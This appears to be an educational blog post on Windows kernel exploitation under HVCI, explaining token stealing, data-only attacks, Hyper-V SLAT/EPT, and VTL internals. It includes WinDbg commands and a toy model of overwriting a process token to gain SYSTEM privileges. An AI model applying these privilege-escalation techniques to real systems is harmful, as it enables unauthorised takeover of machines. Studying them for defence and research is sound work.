I firmly believe there is nothing in life that is more satisfying than wielding the ability to execute unsigned-shellcode. Forcing an application to execute some kind of code the developer of the vulnerable application never intended is what first got me hooked on memory corruption. However, as we saw in my last blog series on browser exploitation, this is already something that, if possible, requires an expensive exploit - in terms of cost to develop. With the advent of Arbitrary Code Guard, and Code Integrity Guard, executing unsigned code within a popular user-mode exploitation “target”, such as a browser, is essentially impossible when these mitigations are enforced properly (and without an existing vulnerability).

Another popular target for exploit writers is the Windows kernel. Just as with user-mode targets such as Microsoft Edge (pre-Chromium), Microsoft has invested extensively in preventing execution of unsigned, attacker-supplied code in the kernel. This is why Hypervisor-Protected Code Integrity (HVCI) is sometimes called “the ACG of kernel mode”. HVCI is a mitigation, as the name implies, that is provided by the Windows hypervisor, Hyper-V.

HVCI is a part of a suite of hypervisor-provided security features known as Virtualization-Based Security (VBS). HVCI uses some of the same technologies employed for virtualization in order to mitigate the ability to execute shellcode/unsigned-code within the Windows kernel. It is worth noting that VBS isn’t HVCI. HVCI is a feature under the umbrella of all that VBS offers (Credential Guard, etc.).

How can exploit writers deal with this “shellcode-less” era? Let’s start by taking a look into how a typical kernel-mode exploit may work and then examine how HVCI affects that mission statement.

“We guarantee an elevated process, or your money back!” - The Kernel Exploit Committee’s Mission Statement

Kernel exploits are (usually) executed locally for local privilege escalation (LPE). Remotely-detonated kernel exploits over a protocol handled in the kernel, such as SMB, are usually rarer, so we will focus on local exploitation.

When kernel vulnerabilities are exploited locally, the exploit usually follows the process below (key word here: usually):

  1. The exploit (which usually is a medium-integrity process if executed locally) uses a kernel vulnerability to read and write kernel memory.
  2. The exploit uses the ability to read/write to overwrite a function pointer in kernel-mode (or finds some other way) to force the kernel to redirect execution into attacker-controlled memory.
  3. The attacker-controlled memory contains shellcode.
  4. The attacker-supplied shellcode executes. The shellcode could be used to arbitrarily call kernel-mode APIs, further corrupt kernel-mode memory, or perform token stealing in order to escalate to NT AUTHORITY\SYSTEM.

Since token stealing is extremely prevalent, let’s focus on it.

We can quickly perform token stealing using WinDbg. If we open up an instance of cmd.exe, we can use the whoami command to see which user this Command Prompt is running in the context of.

Using WinDbg in a kernel-mode debugging session, we can then locate the Token member within the EPROCESS structure using the dt command. Then, using the WinDbg Debugger Object Model, we can leverage the following commands to locate the cmd.exe EPROCESS object, the System process EPROCESS object, and their Token objects.

dx -g @$cursession.Processes.Where(p => p.Name == "System").Select(p => new { Name = p.Name, EPROCESS = &p.KernelObject, Token = p.KernelObject.Token.Object})

dx -g @$cursession.Processes.Where(p => p.Name == "cmd.exe").Select(p => new { Name = p.Name, EPROCESS = &p.KernelObject, Token = p.KernelObject.Token.Object})

The above commands will:

  1. Enumerate all of the current session’s active processes and keep only the process named System (or cmd.exe in the second command)
  2. View the name of the process, the address of the corresponding EPROCESS object, and the Token object

Then, using the ep command to overwrite a pointer, we can overwrite the cmd.exe EPROCESS.Token object with the System EPROCESS.Token object - which elevates cmd.exe to NT AUTHORITY\SYSTEM privileges.
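The dx queries above display Token.Object rather than the raw Token field. The reason is that on x64 builds EPROCESS.Token is an _EX_FAST_REF: the low 4 bits of the pointer-sized value hold a small cached reference count, and the token address is the value with those bits cleared. The Python sketch below only shows that masking. The sample value used in the usage note is made up for illustration.

```python
# x64 _EX_FAST_REF layout: bits 0-3 are RefCnt, the remaining bits are the
# object pointer (4-bit count assumed for x64 builds only).
FAST_REF_BITS = 4
FAST_REF_MASK = (1 << FAST_REF_BITS) - 1  # 0xF
QWORD_MASK = (1 << 64) - 1


def fast_ref_object(value: int) -> int:
    """Return the object (token) address stored in an _EX_FAST_REF value."""
    return value & ~FAST_REF_MASK & QWORD_MASK


def fast_ref_count(value: int) -> int:
    """Return the cached reference count kept in the low bits."""
    return value & FAST_REF_MASK
```

For a made-up Token value of 0xffffc0001234567a, fast_ref_object returns 0xffffc00012345670 and fast_ref_count returns 0xa.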

It is truly a story as old as time, and this is what most kernel-mode exploit authors attempt to do. This can usually be achieved through shellcode, which usually looks something like the image below.

However, with the advent of HVCI - many exploit authors have moved to data-only attacks, as HVCI prevents unsigned-code execution, like shellcode, from running (we will examine why shortly). These so-called “data-only attacks” may work something like the following, in order to achieve the same thing (token stealing):

  1. NtQuerySystemInformation allows a medium-integrity process to leak any EPROCESS object. Using this function, an adversary can locate the EPROCESS object of the exploiting process and the System process.
  2. Using a kernel-mode arbitrary write primitive, an adversary can then copy the token of the System process over the exploiting process, just like before when we manually performed this in WinDbg, simply using the write primitive.
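The two steps above never execute attacker code: they only read and write data. The toy Python model below makes that explicit. It assumes an arbitrary 64-bit read/write primitive is already available and that both EPROCESS addresses have already been leaked. Kernel memory is simulated with a dictionary. TOKEN_OFFSET is a hypothetical placeholder, because the real offset of EPROCESS.Token differs between Windows builds and must be taken from symbols (for example with dt nt!_EPROCESS).

```python
# Toy model of a data-only token swap. Nothing here touches real kernel memory.
TOKEN_OFFSET = 0x4B8  # hypothetical; the real EPROCESS.Token offset varies by build
QWORD_MASK = (1 << 64) - 1


class ToyKernelMemory:
    """Stands in for an arbitrary read/write primitive over 8-byte values."""

    def __init__(self):
        self._qwords = {}

    def read64(self, address: int) -> int:
        return self._qwords.get(address, 0)

    def write64(self, address: int, value: int) -> None:
        self._qwords[address] = value & QWORD_MASK


def swap_token(mem: ToyKernelMemory, system_eprocess: int, own_eprocess: int) -> None:
    """Step 2 above: copy the System token reference over our own."""
    system_token = mem.read64(system_eprocess + TOKEN_OFFSET)
    mem.write64(own_eprocess + TOKEN_OFFSET, system_token)
```

The model makes the limitation discussed next concrete: the only operations available are read64 and write64, so the attacker can rearrange data such as tokens but cannot call arbitrary kernel functions.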

This is all fine and well - but the issue resides in the fact an adversary would be limited to hot-swapping tokens. The beauty of detonating unsigned code is the extensibility to not only perform token stealing, but to also invoke arbitrary kernel-mode APIs as well. Most exploit writers sell themselves short (myself included) by stopping at token stealing. Depending on the use case, “vanilla” escalation to NT AUTHORITY\SYSTEM privileges may not be what a sophisticated adversary wants to do with kernel-mode code execution.

A much more powerful primitive, besides being limited to only token stealing, would be if we had the ability to turn our arbitrary read/write primitive into the ability to call any kernel-mode API of our choosing! This could allow us to allocate pool memory, unload a driver, and much more - with the only caveat being that we stay “HVCI compliant”. Let’s focus on that “HVCI compliance” now to see how it affects our exploitation.

Note that the next three sections contain an explanation of some basic virtualization concepts, along with VBS/HVCI. If you are familiar, feel free to skip to the From Read/Write To Arbitrary Kernel-Mode Function Invocation section of this blog post to go straight to exploitation.

Hypervisor-Protected Code Integrity (HVCI) - What is it?

HVCI, at a high level, is a technology on Windows systems that prevents attackers from executing unsigned-code in the Windows kernel by essentially preventing readable, writable, and executable memory (RWX) in kernel mode. If an attacker cannot write to an executable code page - they cannot place their shellcode in such pages. On top of that, if attackers cannot force data pages (which are writable) to become code pages - said pages which hold the malicious shellcode can never be executed.

How is this manifested? HVCI leverages existing virtualization capabilities provided by the CPU and the Hyper-V hypervisor. If we want to truly understand the power of HVCI it is first worth taking a look at some of the virtualization technologies that allow HVCI to achieve its goals.

Hyper-V 101

Before beginning this section (and the next two sections), note that all information provided can be found within Windows Internals 7th Edition: Part 2, the Intel 64 and IA-32 Architectures Software Developer’s Manual (Combined Volumes), and the Hypervisor Top Level Functional Specification.

Hyper-V is Microsoft’s hypervisor. Hyper-V uses partitions for virtualization purposes. The host operating system is the root partition and child partitions are partitions that are allocated to host a virtual machine. When you create a Hyper-V virtual machine, you are allocating some system resources to create a child partition for the VM. This includes its own physical address space, virtual processors, virtual hard disk, etc. Creating a child partition creates a boundary between the root and child partition(s) - where the child partition is placed in its own address space, and is isolated. This means one virtual machine can’t “touch” other virtual machines, or the host, as the virtual machines are isolated in their own address space.

Among the technologies that help augment this isolation is Second Level Address Translation, or SLAT. SLAT is what actually allows each VM to run in its own address space in the eyes of the hypervisor. Intel’s implementation of SLAT is known as Extended Page Tables, or EPT.

At a basic level, SLAT (EPT) allows the hypervisor to create an additional translation of memory - giving the hypervisor power to delegate memory how it sees fit.

When a virtual machine needs to access physical memory (the virtual machine could have accessed virtual memory within the VM which then was translated into physical memory under the hood), with EPT enabled, the hypervisor will tell the CPU to essentially “intercept” this request. The CPU will translate the memory the virtual machine is trying to access into actual physical memory.

The virtual machine doesn’t know the layout of the physical memory of the host OS, nor does it “see” the actual pages. The virtual machine operates on memory identically to how a normal system would - translating virtual addresses to physical addresses. However, behind the scenes, there is another technology (SLAT) which facilitates the process of taking the physical address the virtual machine thinks it is accessing and translating said physical memory into the actual physical memory on the physical computer - with the VM just operating as normal. Since the hypervisor, with SLAT enabled, is aware of both the virtual machine’s “view” of memory and the physical memory on the host - it can act as arbitrator to translate the memory the VM is accessing into the actual physical memory on the computer (we will come to a visual shortly if this is a bit confusing).

It is worth investigating why the hypervisor needs to perform this additional layer of translation in order to not only understand basic virtualization concepts - but to see how HVCI leverages SLAT for security purposes.

As an example - let’s say a virtual machine tries to access the virtual address 0x1ad0000 within the VM - which (for argument’s sake) corresponds to the physical memory address 0x1000 in the VM. Right off the bat we have to consider that all of this is happening within a virtual machine - which runs on the physical computer in a pre-defined location in memory on that physical computer (a child partition in a Hyper-V setup).

The VM can only access its own “view” of what it thinks the physical address 0x1000 is. The physical location in memory (since VMs run on a physical computer, they use the physical computer’s memory) where the VM is accessing (what it thinks is 0x1000) is likely not going to be located at 0x1000 on the physical computer itself. This can be seen below (please note that the below is just a visual representation, and may not represent things like memory fragmentation, etc.).

In the above image, the physical address of the VM located at 0x1000 is stored at the physical address of 0x4000 on the physical computer. So when the VM needs to access what it thinks is 0x1000, it actually needs to access the contents of 0x4000 on the physical computer.

This creates an issue, as the VM not only needs to compensate for “normal” paging to come to the conclusion that the virtual address in the VM, 0x1ad0000, corresponds to the physical address 0x1000 - but something needs to compensate for the fact that when the VM tries to access the physical address 0x1000 that the memory contents of 0x1000 (in context of the VM) are actually stored somewhere in the memory of the physical computer the VM is running on (in this case 0x4000).

To address this, the following happens: the VM walks the paging structures, starting with the base paging structure, PML4, whose physical address is held in the CR3 register within the VM (as is typical in “normal” memory access). Through paging, the VM would eventually come to the conclusion that the virtual address 0x1ad0000 corresponds to the physical address 0x1000. However, we know this isn’t the end of the conversion because, although 0x1000 exists in the context of the VM as 0x1000, the memory stored there actually lives somewhere else in the physical memory of the physical computer (in this case 0x4000).

With SLAT enabled the physical address in the VM (0x1000) is treated as a guest physical address, or GPA, by the hypervisor. Virtual machines emit GPAs, which then are converted into a system physical address, or SPA, by the physical CPU. SPAs refer to the actual physical memory on the physical computer the VM(s) is/are running on.
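The two translation stages in the running example (GVA 0x1ad0000 to GPA 0x1000, then GPA 0x1000 to SPA 0x4000) can be modeled in a few lines. This is a deliberately simplified Python sketch. Each “page table” is a flat dictionary from page number to frame number instead of a real four-level hierarchy. A missing entry simply raises KeyError where real hardware would raise a page fault (guest tables) or an EPT violation (extended page tables).

```python
PAGE_SIZE = 0x1000

# Guest-managed mapping: guest virtual page -> guest physical page.
guest_page_table = {0x1AD0000 // PAGE_SIZE: 0x1000 // PAGE_SIZE}
# Hypervisor-managed mapping (EPT): guest physical page -> system physical page.
extended_page_table = {0x1000 // PAGE_SIZE: 0x4000 // PAGE_SIZE}


def translate(table: dict, address: int) -> int:
    """Map one address through a single flat table, keeping the page offset."""
    page, offset = divmod(address, PAGE_SIZE)
    frame = table[page]  # KeyError stands in for a page fault / EPT violation
    return frame * PAGE_SIZE + offset


def gva_to_spa(gva: int) -> int:
    """Two-stage translation: guest paging first, then the EPT."""
    gpa = translate(guest_page_table, gva)      # stage 1: the VM's own paging
    return translate(extended_page_table, gpa)  # stage 2: the CPU walking the EPT
```

With these tables, gva_to_spa(0x1ad0000) returns 0x4000, and any offset inside the page is carried through unchanged (0x1ad0abc becomes 0x4abc).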

The way this is done is through another set of paging structures called extended page tables (EPTs). The base paging structure for the extended page tables is known as the EPT PML4 structure - similarly to a “traditional” PML4 structure. As we know, the PML4 structure is used to further identify the other paging structures - which eventually lead to a 4KB-aligned physical page (on a typical Windows system). The same is true for the EPT PML4 - but instead of being used to convert a virtual address into a physical one, the EPT PML4 is the base paging structure used to map a VM-emitted guest physical address into a system physical address.
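Both walks start by slicing the address into table indices. With four-level paging (and a four-level EPT), bits 47:39 index the PML4 (or EPT PML4), bits 38:30 the PDPT, bits 29:21 the page directory, and bits 20:12 the page table. Bits 11:0 are the offset inside the 4KB page. A short Python sketch of that slicing:

```python
def split_4level(address: int) -> dict:
    """Split a 48-bit address into 4-level paging indices and a page offset."""
    return {
        "pml4": (address >> 39) & 0x1FF,  # 9 bits
        "pdpt": (address >> 30) & 0x1FF,  # 9 bits
        "pd": (address >> 21) & 0x1FF,    # 9 bits
        "pt": (address >> 12) & 0x1FF,    # 9 bits
        "offset": address & 0xFFF,        # 12 bits
    }
```

For the example address 0x1ad0000 this yields PML4 index 0, PDPT index 0, PD index 0xd, PT index 0xd0, and offset 0. The EPT walk applies the same slicing to the guest physical address instead.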

The EPT PML4 structure is referenced by a pointer known as the Extended Page Table Pointer, or EPTP. An EPTP is stored in a per-VCPU (virtual processor) structure called the Virtual Machine Control Structure, or VMCS. The VMCS holds various information, including state information about a VM and the host. The EPTP can be used to start the process of converting GPAs to SPAs for a given virtual machine. Each virtual machine has an associated EPTP.
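The EPTP itself is a small packed value. Per the Intel SDM, bits 2:0 hold the memory type used for the EPT paging structures (6 = write-back), and bits 5:3 hold the EPT page-walk length minus one (3 for a four-level walk). Bit 6 enables accessed/dirty flags, and the upper bits hold the 4KB-aligned physical address of the EPT PML4 table. The Python sketch below only encodes those fields and ignores the remaining optional bits. It illustrates the layout and is not how Hyper-V builds its VMCS.

```python
EPT_MEMORY_TYPE_UC = 0
EPT_MEMORY_TYPE_WB = 6


def make_eptp(pml4_physical: int, walk_length: int = 4,
              memory_type: int = EPT_MEMORY_TYPE_WB, enable_ad: bool = False) -> int:
    """Pack an EPT pointer from the physical address of the EPT PML4 table."""
    if pml4_physical & 0xFFF:
        raise ValueError("the EPT PML4 table must be 4KB-aligned")
    eptp = memory_type & 0x7                # bits 2:0
    eptp |= ((walk_length - 1) & 0x7) << 3  # bits 5:3
    if enable_ad:
        eptp |= 1 << 6                      # bit 6
    return eptp | pml4_physical             # bits N-1:12


def eptp_pml4_address(eptp: int) -> int:
    """Recover the EPT PML4 physical address (ignores bits above 51)."""
    return eptp & 0x000F_FFFF_FFFF_F000
```

For a hypothetical EPT PML4 at physical address 0x1234000, make_eptp returns 0x123401e (write-back, four-level walk).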

To map guest physical addresses (GPAs) to system physical addresses (SPAs), the CPU “intercepts” a GPA emitted from a virtual machine. The CPU then takes the guest physical address (GPA) and uses the extended page table pointer (EPTP) from the VMCS structure for the virtual CPU the virtual machine is running under, and it uses the extended page tables to map the GPA to a system physical address (SPA).

The above process allows the hypervisor to map what physical memory the guest VM is actually trying to access, due to the fact the VM only has access to its own allocated address space (like when a child partition is created for the VM to run in).

The page table entries within the extended page tables are known as extended page table entries, or EPTEs. These act essentially the same as “traditional” PTEs - except for the fact that EPTEs are used to translate a GPA into an SPA - instead of translating a virtual address into a physical one (along with some other nuances). What this also means is that EPTEs are only used to describe physical memory (guest physical addresses and system physical addresses).

The reason why EPTEs only describe physical memory is pretty straightforward. The “normal” page table entries (PTEs) are already used to map virtual memory to physical memory - and they are also used to describe virtual memory. Think about a normal PTE structure - it stores some information which describes a given virtual page (readable, writable, etc.) and it also contains a page frame number (PFN) which, when multiplied by the size of a page (usually 0x1000), gives us the physical page backing the virtual memory. This means we already have a mechanism to map virtual memory to physical memory - so the EPTEs are used for GPAs and SPAs (physical memory).
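The PFN arithmetic above is easy to see on a raw x64 PTE. In the hardware format, bit 0 is Present, bit 1 is Read/Write, bit 2 is User/Supervisor, bit 63 is No-Execute, and bits 51:12 hold the PFN. Multiplying the PFN by 0x1000 gives the physical address of the page. The Python sketch below decodes just those fields and ignores the rest, including the bits Windows uses for its own bookkeeping.

```python
PAGE_SIZE = 0x1000
PFN_MASK = (1 << 40) - 1  # bits 51:12 after shifting right by 12


def decode_pte(pte: int) -> dict:
    """Decode the permission bits and PFN of a raw x64 page table entry."""
    pfn = (pte >> 12) & PFN_MASK
    return {
        "present": bool(pte & 0x1),
        "writable": bool(pte & 0x2),
        "user": bool(pte & 0x4),
        "no_execute": bool((pte >> 63) & 0x1),
        "pfn": pfn,
        "physical_address": pfn * PAGE_SIZE,
    }
```

For a made-up PTE value of 0x8000000000004003, the page is present, writable, kernel-only, and non-executable, with PFN 4 and therefore physical address 0x4000.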

Another interesting side effect of applying EPTEs only to physical memory is that physical memory trumps virtual memory. We will talk more later about how this affects traditional PTEs, and about how much enforcement PTEs have over memory when coupled with EPTEs.

For instance, if a given virtual page is marked as readable/writable/executable in its PTE - but the physical page backing that virtual page is described as only readable - any attempt to execute and/or write to the page will result in an access violation. Since the EPTEs describe physical memory and are managed by the hypervisor, the hypervisor can enforce its “view” of memory leveraging EPTEs - meaning that the hypervisor ultimately can decide how a given page of RAM should be defined. This is the key tenet of HVCI.
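The rule that the stricter of the two views wins can be written as a simple intersection. This is a simplified Python model that assumes the page is present in the guest PTE. EPT entries use bit 0 for read, bit 1 for write, and bit 2 for execute access. Real HVCI additionally relies on mode-based execute control (separate kernel and user execute permissions), which is not modeled here.

```python
EPT_READ = 0x1     # EPTE bit 0
EPT_WRITE = 0x2    # EPTE bit 1
EPT_EXECUTE = 0x4  # EPTE bit 2 (simplified: no mode-based execute control)


def effective_access(pte_writable: bool, pte_executable: bool, epte: int) -> dict:
    """An access is allowed only if the guest PTE AND the EPTE both allow it."""
    return {
        "read": bool(epte & EPT_READ),  # assumes the guest PTE maps the page as present
        "write": pte_writable and bool(epte & EPT_WRITE),
        "execute": pte_executable and bool(epte & EPT_EXECUTE),
    }
```

Calling effective_access(True, True, EPT_READ) models an RWX PTE over a read-only EPTE and reports only read access, which is exactly the situation described above.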

Think back to our virtual machine to physical machine example. The VM has its own view of memory, but ultimately the hypervisor has the “supreme” view of memory. It understands where the VM thinks it is accessing and it can correlate that to the actual place in memory on the physical computer. In other words, the hypervisor contains the “ultimate” view of memory.

Now, I am fully aware a lot of information has been mentioned above. At a high level, we should walk away with the following knowledge:

  1. It is possible to isolate a virtual machine in its own address space.
  2. It is possible to abstract the physical memory that truly exists on the host operating system away from the virtual machine.
  3. Physical memory trumps virtual memory (if virtual memory is read/write and the physical memory is read-only, any write to the region will cause an access violation).
  4. EPTEs facilitate the “supreme” view of memory, and have the “final say”.

The above concepts are the basis for HVCI (which we will expand upon in the next section).

Before leaving this section of the blog post - we should recall what was said earlier about HVCI:

HVCI is a feature under the umbrella of all that VBS offers (Credential Guard, etc.).

What this means is that Virtualization-Based Security is responsible for enabling HVCI. Knowing that VBS is responsible for enabling HVCI (should it be enabled on the host operating system which, as of Windows 11 and Windows 10 “Secured Core” PCs, it is by default), the last thing we need to look at is how VBS takes advantage of all of these virtualization technologies we have touched on in order to instrument HVCI.

Virtualization-Based Security

With Virtualization-Based Security enabled, the Windows operating system runs in a “virtual machine”, of sorts. Although Windows isn’t placed into a child partition, meaning it doesn’t have a VHD, or virtual hard disk, the hypervisor, at boot, makes use of all of the aforementioned principles and technologies to isolate the “standard” Windows kernel (i.e. what the end-user interfaces with) in its own region, similarly to how a VM is isolated. This isolation is manifested through Virtual Trust Levels, or VTLs. Currently there are two Virtual Trust Levels: VTL 1, which hosts the “secure kernel”, and VTL 0, which hosts the “normal kernel”, with the “normal kernel” being what end-users interact with. Both of these VTLs are located in the root partition. You can think of these two VTLs as “isolated virtual machines”.

VTLs, similarly to virtual machines, provide isolation between the two environments (in this case between the “secure kernel” and the “normal kernel”). Microsoft considers the “secure” environment, VTL 1, to be a “more privileged entity” than VTL 0 - with VTL 0 being what a normal user interfaces with.

The goal of the VTLs is to create a higher security boundary (VTL 1) where if a normal user exploits a vulnerability in the kernel of VTL 0 (where all users are executing, only Microsoft is allowed in VTL 1), they are limited to only VTL 0. Historically, however, if a user compromised the Windows kernel, there was nothing else to protect the integrity of the system - as the kernel was the highest security boundary. Now, since VTL 1 is of a “higher boundary” than VTL 0 - even if a user exploits the kernel in VTL 0, there is still a component of the system that is totally isolated (VTL 1) from where the malicious user is executing (VTL 0).

It is crucial to remember that although VTL 0 is a “lower security boundary” than VTL 1 - VTL 0 doesn’t “live” in VTL 1. VTL 0 and VTL 1 are two separate entities - just as two virtual machines are two separate entities. On the same note - it is also crucial to remember that VBS doesn’t actually create virtual machines - VBS leverages the virtualization technologies that a hypervisor may employ for virtual machines in order to isolate VTL 0 and VTL 1. Microsoft instruments these virtualization technologies in such a way that, although VTL 1 and VTL 0 are separated like virtual machines, VTL 1 is allowed to impose its “will” on VTL 0. When the system boots, and the “secure” and “normal” kernels are loaded - VTL 1 is then allowed to “ask” the hypervisor, through a mechanism called a hypercall (more on this later in the blog post), if it can “securely configure” VTL 0 (which is what the normal user will be interfacing with) in a way it sees fit, when it comes to HVCI. VTL 1 can impose its will on VTL 0 - but it goes through the hypervisor to do this. To summarize - VTL 1 isn’t the hypervisor, and VTL 0 doesn’t live in VTL 1. VTL 1 works with the hypervisor to configure VTL 0 - and all three are their own separate entities. The following image is from Windows Internals, Part 1, 7th Edition - which visualizes this concept.

We’ve talked a lot now on SLAT and VTLs - let’s see how these technologies are both used to enforce HVCI.

After the “secure” and “normal” kernels are loaded - execution eventually redirects to the entry point of the “secure” kernel, in VTL 1. The secure kernel will set up SLAT/EPT, by asking the hypervisor to create a series of extended page table entries (EPTEs) for VTL 0 through the hypercall mechanism (more on this later). We can think of this as if we are treating VTL 0 as “the guest virtual machine” - just like how the hypervisor would treat a “normal” virtual machine. The hypervisor would set up the necessary EPTEs that would be used to map the guest physical addresses generated from a virtual machine into actual physical memory (system physical addresses). However, let’s recall the architecture of the root partition when VTLs are involved.

As we can see, both VTL 1 and VTL 0 reside within the root partition. This means that, theoretically, both VTL 1 and VTL 0 have access to the physical memory on the physical computer. At this point you may be wondering - if both VTL 1 and VTL 0 reside within the same partition - how is there any separation of address space/privileges? VTL 0 and VTL 1 seem to share the same physical address space. This is where virtualization comes into play!

Microsoft leverages all of the virtualization concepts we have previously talked about, and essentially places VTL 1 and VTL 0 into “VMs” (logically speaking) in which VTL 0 is isolated from VTL 1, and VTL 1 has control over VTL 0 - with this architecture being the basis of HVCI (more on the technical details shortly).

If we treat VTL 0 as “the guest” we then can use the hypervisor and CPU to translate addresses requested from VTL 0 (the hypervisor “manages” the EPTEs but the CPU performs the actual translation). Since GPAs are “intercepted”, in order for them to be converted into SPAs, this provides a mechanism (via SLAT) to “intercept” or “gate” any memory access stemming from VTL 0.

Here is where things get very interesting. Generally speaking, the GPAs emitted by VTL 0 actually map to the same physical memory on the system.

Let’s say VTL 0 requests to access the physical address 0x1000, as a result of a virtual address within VTL 0 being translated to the physical address 0x1000. The address of the GPA, which is 0x1000, is still located at an SPA of 0x1000. This is due to the fact that virtual machines, in Hyper-V, are confined to their respective partitions - and since VTL 1 and VTL 0 live in the same partition (the root), they “share” the same physical memory address space (which is the actual physical memory on the system).

So, since EPT (with HVCI enabled) isn’t used to “find” the physical address a GPA corresponds to on the system - due to the GPAs and SPAs mapping to the same physical address - what on earth could they be used for?

Instead of using extended page table entries to map a GPA to a different SPA, the EPTEs are used to create a “second view” of memory. With HVCI, this view describes all of RAM as either readable and writable (RW) but not executable, or readable and executable (RX) but not writable. This ensures that no pages exist in the kernel which are writable and executable at the same time, which is exactly what running unsigned code would require!

Recall that EPTEs are used to describe each physical page. Just as a virtual machine has its own view of memory, VTL 0 also has its own view of memory, which it manages through standard, normal PTEs. The key to remember, however, is that at boot - code in VTL 1 works with the hypervisor to create EPTEs which have the true definition of memory - while the OS in VTL 0 only has its view of memory. The hypervisor’s view of memory is “supreme” - as the hypervisor is a “higher security boundary” than the kernel, which historically managed memory. This, as mentioned, essentially creates two “mappings” of the actual physical memory on the system - one is managed by the Windows kernel in VTL 0, through traditional page table entries, and the other is managed by the hypervisor using extended page table entries.

Since we know EPTEs are used to describe physical memory, they can be used to override any protections set by the “traditional” PTEs in VTL 0. And since the hypervisor’s view of memory trumps the view of the OS (in VTL 0), HVCI leverages the fact that the EPTEs are managed by a more “trusted” boundary, the hypervisor, which makes them immutable in the context of VTL 0, where the normal users live.

As an example, let’s say you use the !pte command in WinDbg to view the PTE for a given virtual memory address in VTL 0, and WinDbg says that page is readable, writable, and executable. However, the EPTE (which is not visible to VTL 0) may actually describe the physical page backing that virtual address as only readable. This means the page would be only readable, even though the PTE in VTL 0 says otherwise!

HVCI leverages SLAT/EPT in order to ensure that there are no pages in VTL 0 which can be abused to execute unsigned code (by enforcing the aforementioned principles on RWX memory). It does this by guaranteeing that code pages never become writable and that data pages never become executable. You can think of EPTEs being used (with HVCI) to basically create an additional “mapping” of memory, with all memory being either RW- or R-X, and with this “mapping” of memory trumping the “normal” enforcement of memory through normal PTEs. The EPTE “view” of memory is the “root of trust” now. These EPTEs are managed by the hypervisor, which VTL 0 cannot touch.
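To make the “two views” idea concrete, here is a toy model in C. It is a simplification, assuming permissions can be reduced to three flags (read, write, execute) and that an access is only allowed when both the VTL 0 PTE and the EPTE grant it. The flag and function names are hypothetical and do not reflect the real PTE or EPTE bit layouts.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical permission flags for this toy model only. */
enum {
    PERM_R = 1u << 0,
    PERM_W = 1u << 1,
    PERM_X = 1u << 2
};

/*
 * The effective permission of a page is what BOTH views allow:
 * the VTL 0 PTE (managed by the NT kernel) and the EPTE (managed by
 * the hypervisor). Code in VTL 0 can only change the first operand.
 */
static uint32_t effective_perms(uint32_t pte_perms, uint32_t epte_perms)
{
    return pte_perms & epte_perms;
}

/* HVCI-style invariant for kernel-mode pages: never W and X together. */
static bool epte_respects_hvci(uint32_t epte_perms)
{
    return (epte_perms & (PERM_W | PERM_X)) != (PERM_W | PERM_X);
}
```

This mirrors the !pte example above: a PTE that claims RWX combined with an EPTE that only grants R yields a page that is effectively read-only.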

We now know that the EPTEs hold the “true” definition of memory, so a logical question is: “how does a request from the OS to set up an EPTE work, if the EPTEs are managed by the hypervisor?” As an example, let’s examine how boot-loaded drivers have their memory protected by HVCI. The process of loading runtime drivers is different, but the mechanism used to apply SLAT page protections (a hypercall, more on this later) is the same for runtime drivers and boot-loaded drivers.

We know that VTL 1 performs the request for the configuration of EPTEs in order to configure VTL 0 in accordance with HVCI (no memory that is writable and executable). This means that securekernel.exe - which is the “secure kernel” running in VTL 1 - must be responsible for this. Cross referencing the VSM startup section of Windows Internals, we can observe the following:

… Starts the VTL secure memory manager, which creates the boot table mapping and maps the boot loader’s memory in VTL 1, creates the secure PFN database and system hyperspace, initializes the secure memory pool support, and reads the VTL 0 loader block to copy the module descriptors for the Secure Kernel’s imported images (Skci.dll, Cnf.sys, and Vmsvcext.sys). It finally walks the NT loaded module list to establish each driver state, creating a NAR (normal address range) data structure for each one and compiling a Normal Table Entry (NTE) for every page composing the boot driver’s sections. FURTHERMORE, THE SECURE MEMORY MANAGER INITIALIZATION FUNCTION APPLIES THE CORRECT VTL 0 SLAT PROTECTION TO EACH DRIVER’S SECTIONS.

Let’s start with the “secure memory manager initialization function” - which is securekernel!SkmmInitSystem.

securekernel!SkmmInitSystem performs a multitude of things, as seen in the quote from Windows Internals. Towards the end of the function, the memory manager initialization function calls securekernel!SkmiConfigureBootDriverPages - which eventually “applies the correct VTL 0 SLAT protection to each [boot-loaded] driver’s sections”.

There are a few code paths which can be taken within securekernel!SkmiConfigureBootDriverPages to configure the VTL 0 SLAT protection for HVCI - but the overall “gist” is:

  1. Check if HVCI is enabled (via SkmiFlags).
  2. If HVCI is enabled, apply the appropriate protection.

As mentioned in Windows Internals, every section (.text, etc.) of each boot-loaded driver is protected by HVCI. This is done by iterating through each section of the boot-loaded drivers and applying the correct VTL 0 permissions. In the specific code path shown below, this is done via the function securekernel!SkmiProtectSinglePage.

Notice that securekernel!SkmiProtectSinglePage has its second argument as 0x102. Examining securekernel!SkmiProtectSinglePage a bit further, we can see that this function (in the particular manner securekernel!SkmiProtectSinglePage is called within securekernel!SkmiConfigureBootDriverPages) will call securekernel!ShvlProtectContiguousPages under the hood.

securekernel!ShvlProtectContiguousPages is called because of the if ((a2 & 0x100) != 0) check in the above function. That check is satisfied, because the provided argument was 0x102, and 0x102 bitwise AND’d with 0x100 is 0x100, which does not equal 0. The last argument provided to securekernel!ShvlProtectContiguousPages is the appropriate protection mask for the VTL 0 page. Remember, this code is executing in VTL 1, and VTL 1 is allowed to configure the “true” memory permissions (via EPTEs) of VTL 0 as it sees fit.
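The branch boils down to a single bitwise test. In the sketch below, only the constants 0x102 and 0x100 come from the decompiled code; the macro and function names are hypothetical labels for what the check does.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical name for the 0x100 bit tested in SkmiProtectSinglePage. */
#define PROTECT_FLAG_CONTIGUOUS_PATH 0x100u

/* Mirrors the decompiled `if ((a2 & 0x100) != 0)` check. */
static bool takes_contiguous_path(uint32_t a2)
{
    return (a2 & PROTECT_FLAG_CONTIGUOUS_PATH) != 0;
}
```

With a2 = 0x102, the AND leaves 0x100, so the ShvlProtectContiguousPages path is taken; a value without bit 8 set (for example 0x2) would not take it.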

securekernel!ShvlProtectContiguousPages, under the hood, invokes a function called securekernel!ShvlpProtectPages - essentially acting as a “wrapper”.

Looking deeper into securekernel!ShvlpProtectPages, we notice some interesting functions with the word “hypercall” in them.

Grabbing one of these functions (securekernel!ShvlpInitiateVariableHypercall will be used, as we will see later), we can see it is a wrapper for securekernel!HvcallpInitiateHypercall - which ends up invoking securekernel!HvcallCodeVa.

